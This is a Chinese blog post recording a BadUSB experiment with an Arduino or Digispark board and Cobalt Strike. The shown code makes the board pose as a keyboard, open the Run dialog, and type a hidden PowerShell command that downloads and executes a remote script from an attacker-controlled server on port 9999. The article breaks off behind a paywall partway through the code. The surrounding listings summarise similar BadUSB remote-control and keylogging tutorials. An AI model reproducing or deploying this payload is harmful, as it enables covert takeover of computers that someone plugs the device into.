曾经很火的BADUSB测试记录

BADUSB实战
原创 已于 2023-06-02 14:35:03 修改 · 1.6k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #badusb #colbat strike

于 2022-10-11 17:47:49 首次发布

0、前言

最近在做个针对BADUSB的专题,所以静下心来对这这方面做了一些简单的测试和研究,正好可以结合Cobalt Strike、结合其他功能代码做个联合测试。所以斥资花了50多块钱买了USB开发板。
在正文开始之前,先炫耀一下自己的测试装备。
在这里插入图片描述
1.机械键盘
买了个键线分离,三模机械键盘,虽然手感和顶级的没法比,但是好在支持蓝牙、支持热插拔、支持充电电池的内卷键盘。
支持蓝牙的好处是可以连接手机远程登录VPS。
同时支持3个设备配对,笔记本和手机之间无缝切换,穿格子衫的快乐就是这么简单。
然后花了几十块钱买了个茶轴和白色键帽,也就是说有2套轴,2套帽,搭配着用。
2.显示器
同事做测试的显示器,这个没有花钱,临时借用。因为是很老的显示器,最高分辨率只到1600*900,凑合用吧。
至少支持kali虚拟机扩展到显示器,相当于2台主机。

1、准备工作

关于BadUSB的原理、介绍、危害、防范详情请查看网上文档。这里直接来干货。
a。首先需要一个开发板,网店上有好多售卖的。
我买了2个,一个是Arduino Micro,一个是Digispark。
b。软件:Arduino
建议从官方下载,如果是Arduino开发板的话,官方下载的安装版本自带驱动,不需要另外安装。我没有使用绿色免安装版。
c。准备一台VPS,如果没有条件可以使用本地局域网环境。
d。下载BadUSB脚本,github上有一个不错的。
https://github.com/Xyntax/BadUSB-code

2、测试过程

2.1 制作BADUSB

a。将BADUSB插入笔记本,打开Arduino,复制代码到编辑区域。

#include <Keyboard.h>
void setup(){
   
   //初始化 
Keyboard.begin();//开始键盘通讯 
delay(6000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(200);
Keyboard.press('r');//r键
delay(200); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); 
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(200);
Keyboard.println("CMD");
delay(200);
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
delay(300);
Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***:9999/MAIN.PS1') ");
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN
最低0.47元/天 解锁文章
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
【近源攻击】badusb制作
qinjilll的博客
09-14 2260
BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。HID(Human InterfaceDevice)设备通常指的就是键盘鼠标等与人交互的设备,用户插入BadUSB,就会自动执行预置在固件中的恶意代码。BadUsb插入后,会模拟键盘鼠标对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载其他代码并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
BadUSB测试记录
weixin_34223655的博客
09-07 393
0x00 前言 不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。 0x01参考资料 https://github.com/adamcaudill/Psychsonhttps://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloadshttp://zone...
【限时免费】 【BadUSB】开源下载和安装教程
gitblog_01410的博客
08-05 363
BadUSB】开源下载和安装教程 【免费下载链接】BadUSB 利用USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令 项目地址: http...
十块钱=简单的黑客工具[badusb制作]
最新发布
qq_45908842的博客
09-03 1026
十块钱=简单的黑客工具[badusb制作]
使用树莓派Pico制作一个Badusb 配合CobaltStrike拿下任意电脑 攻击一切带usb接口的设备
mayiseeu的博客
01-23 1497
免责声明:本文章仅供安全研究和教学目的使用,用户须自行承担因使用该技术而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。
Badusb原理及制作并简单免杀实现远控教程
热门推荐
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
BadUSB利用以及免杀(测试bypass某数字卫士)
r250414958的博客
03-03 1352
文章写了有一段时间了,本来打算投稿某网站的,但发现太菜了,索性算了 系统:windows_7_64_专业版 工具:cobalt strike3.14、Teensy++2.0 关于利用方面 我首先就想到了powershell,但是网上的免杀方法已经被杀得七七八八了 但是天无绝人之路,再继续搜索下看到了白色键盘师傅的文章,经过测试可绕过文章发布最新的某数字卫士上线 https://www.temp33.com/bypass%E7%B3%BB%E5%88%97-%E7%BB%95%E8%BF%87360%E6%
BadUSB攻击
qq_45391176的博客
09-08 3057
一文读懂Bad USB
micropython移植后不识别usb_【micropython】用python来进行BadUSB的USB-HID测试(含无线控制)...
weixin_39932762的博客
12-05 296
本文以TPYBoardv102开发板为例讲解了利用micropython进行BadUSB的usb-HID设备测试的主要方法,使用mt7681模块进行了一个简单的实验,实现了手机摇控键盘输入的测试。最近从 网上搞了一块tpyboard V102(官网www.micropython.net.cn)进行了一下研究,特别是对其自身的USB-HID功能进行了测试,令人惊喜的是,你可以在仅懂python的情况...
badusb制作记录<开发配置问题详解>
geek-7的博客
10-04 980
基于attiny85开发板的badusb创作一、购买开发板attiny85二、驱动程序安装三、安装开发工具Arduino IDE四、配置开发板环境1、下载digistump相关文件2、更改网络文件地址3、配置arduino,下载开发板五、编写程序 一、购买开发板attiny85 上图为usb attiny85开发板,某宝10块钱左右。 整个制作过程无需焊接,只需要插入电脑烧录程序即可。 - . 二、驱动程序安装 1、安装开发板驱动程序,下载驱动文件:https://github.com/digistump
badusb_badusb_
09-29
badusb资料,需要自行打包带走
BadUSB电缆基于Attiny85微控制器,启用了数据线_设计_文档_相关文件_下载
07-07
BadUSB 电缆基于 Attiny85 微控制器,启用了数据线。 概括: 致谢 介绍 免责声明 安装 引导加载程序 基本要求(Ubuntu 和 Windows) 安装 Digispark USB 驱动程序(仅限 Windows) Micronucleus Windows 的安装和更新(仅限 Windows,未测试) Micronucleus Ubuntu 的安装和更新(仅限 Ubuntu) 上传有效负载(Ubuntu 和 Windows) 有效负载(Ubuntu 和 Windows) 虚拟机 数据线信息 攻击选项 更多详情、使用方法,请下载后阅读README.md文件
bad usb编译器
08-08
bad usb的编译器,欢迎下载。 Digispark Digispark是一个基于ATTINY85微控制器的开发板,体积小且价钱便宜,功能方面则没有Arduino般强大。代码与Arduino大同小異,也是使用Arduino IDE开发。 Digispark是Digistump LLC (digistump.com)版权所有,请使用者仔细阅读Digispark使用协议和版权声明 Digispark的特别之处是使用了USB与电脑沟通,省了USB至串口转换器。为此,Digispark必须占用2KB的快闪记忆体(Flash Memory)以便用来安装Bootloader。 Digispark的功能 打开Examples,大概知道Digispark的功能到达什么程度了。麻雀虽小,五脏俱全。
Badusb进阶之获取用户键盘记录(Arduino+python)
zbp_12138的博客
02-17 1965
看似小小的U盘,可能存在大大的隐患 你以为这只是普通的U盘?看完这篇文章,你会对它有新的认识 今天我们实现的功能很简单:获取用户的键盘使用记录,比如,用户在登陆QQ的过程中,输入了密码,密码是不可见的,但是我们可以通过程序获取用户的键盘信息,这样一来,我们就可以通过这段信息,轻松获取用户的密码。 获取键盘输入内容...
『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本
Moxin1044的博客
02-02 3788
一个数据线,一个手机,动动手指拿下电脑控制权。 『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本) 当然不是只有nethunter的设备可以,凡是root的设备均可。 先上一下视频地址:跳转到Bilibili 紧跟着之前的贴子:https://bbs.ichunqiu.com/thread-59907-1-1.html 这期文章,是主要讲述我们Kali nethunter设备的一个名为”Rucky”的App。这款App可以对Windows电脑、An.
BadUSB利用方式及代码集锦:覆盖多操作系统版本
攻击者可以利用BadUSB进行多种恶意活动,包括但不限于键盘记录、数据注入、系统入侵等。本资源包主要收集了BadUSB的一些利用方式和相关的代码示例。 一、BadUSB攻击技术概述 BadUSB的攻击原理在于USB设备的固件可以...
java u盘检测工具,BadUSB测试记录
weixin_30489285的博客
03-20 306
0x00 前言不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。0x01参考资料0x02环境搭建1、硬件U盘 :东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0主控版本:Phison2251-032、软件Windows x64主机(1)Java Runtime Environment :Java环境,用于支持Duckencoder(2)...
BadUSB的攻击原理与防范
qq_43036756的博客
11-26 1689
计算机的日益发展,给人们带来便利的同时也带来了不少的隐患,除了病毒,木马的攻击,这几年还悄然流行起一种更为隐蔽,更加不引人瞩目的攻击方式——BadUSB攻击,通过一个外观相似U盘的可编程开发板,来对UBS设备进行恶意攻击和控制,使人不易察觉。
三步实现BadUSB制作与代码烧录详解
该技术通常被称为“BadUSB”,因其潜在的恶意用途而备受关注,但同时也被用于合法的安全测试和自动化任务中。本文从标题和描述出发,深入解析其背后的技术原理、实现步骤以及相关知识体系。 首先,制作BadUSB的第一...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值